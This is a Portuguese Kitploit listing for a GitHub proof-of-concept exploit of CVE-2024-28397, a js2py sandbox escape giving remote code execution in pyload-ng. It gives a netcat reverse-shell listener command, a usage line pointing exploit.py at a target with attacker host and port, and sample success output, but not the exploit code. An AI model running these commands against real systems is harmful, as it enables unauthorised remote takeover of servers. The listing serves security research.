Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Remote-Code-Execution-CVE-2024-28397-pyload-ng-js2py- — Exploit de PoC para CVE-2024-28397 – Execução Remota de Código em pyload-ng via fuga de sandbox do js2py | Kitploit
Ferramentas/GitHubGitHub/udayveer17/remote-code-execution-cve-2024-28397-pyload-ng-js2py-
Análise de VulnerabilidadesExploraçãoExploração de Aplicações Web
GitHubudayveer17/remote-code-execution-cve-2024-28397-pyload-ng-js2py-

Remote-Code-Execution-CVE-2024-28397-pyload-ng-js2py-

Exploit de PoC para CVE-2024-28397 – Execução Remota de Código em pyload-ng via fuga de sandbox do js2py

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
há 1 mêsAinda não revisado

Execução Remota de Código – CVE-2024-28397 (pyload-ng / js2py)

Este repositório contém um exploit de Prova de Conceito (PoC) para CVE-2024-28397, uma vulnerabilidade de Execução Remota de Código que afeta pyload-ng devido ao uso inseguro de js2py.

Aviso:
Este PoC é apenas para fins educacionais e de pesquisa.
Não o utilize em sistemas que não possui ou para os quais não tenha permissão explícita para testar.
O autor não se responsabiliza por qualquer uso indevido deste código.


Detalhes da Vulnerabilidade

  • CVE ID: CVE-2024-28397
  • Componente: js2py em pyload-ng
  • Impacto: Execução Remota de Código (RCE)
  • Vetor de Ataque: O payload JS malicioso escapa da sandbox js2py e executa comandos arbitrários do sistema.

Requisitos e Configuração

Você precisará de Python 3.x, da biblioteca requests e do netcat para capturar o reverse shell.

  • Alvo → Instância vulnerável do pyload-ng com endpoint /run_code acessível

Listener → Inicie antes de executar o exploit:

nc -lvnp 4444

Uso:

python3 exploit.py -url http://target.com -lhost YOUR_IP -lport 4444 -user attacker -passwd attacker123

Exemplo de Saída:

  • [+] Registro bem-sucedido!
  • [+] Login bem-sucedido
  • [+] exploit funcionou
Baixar ferramenta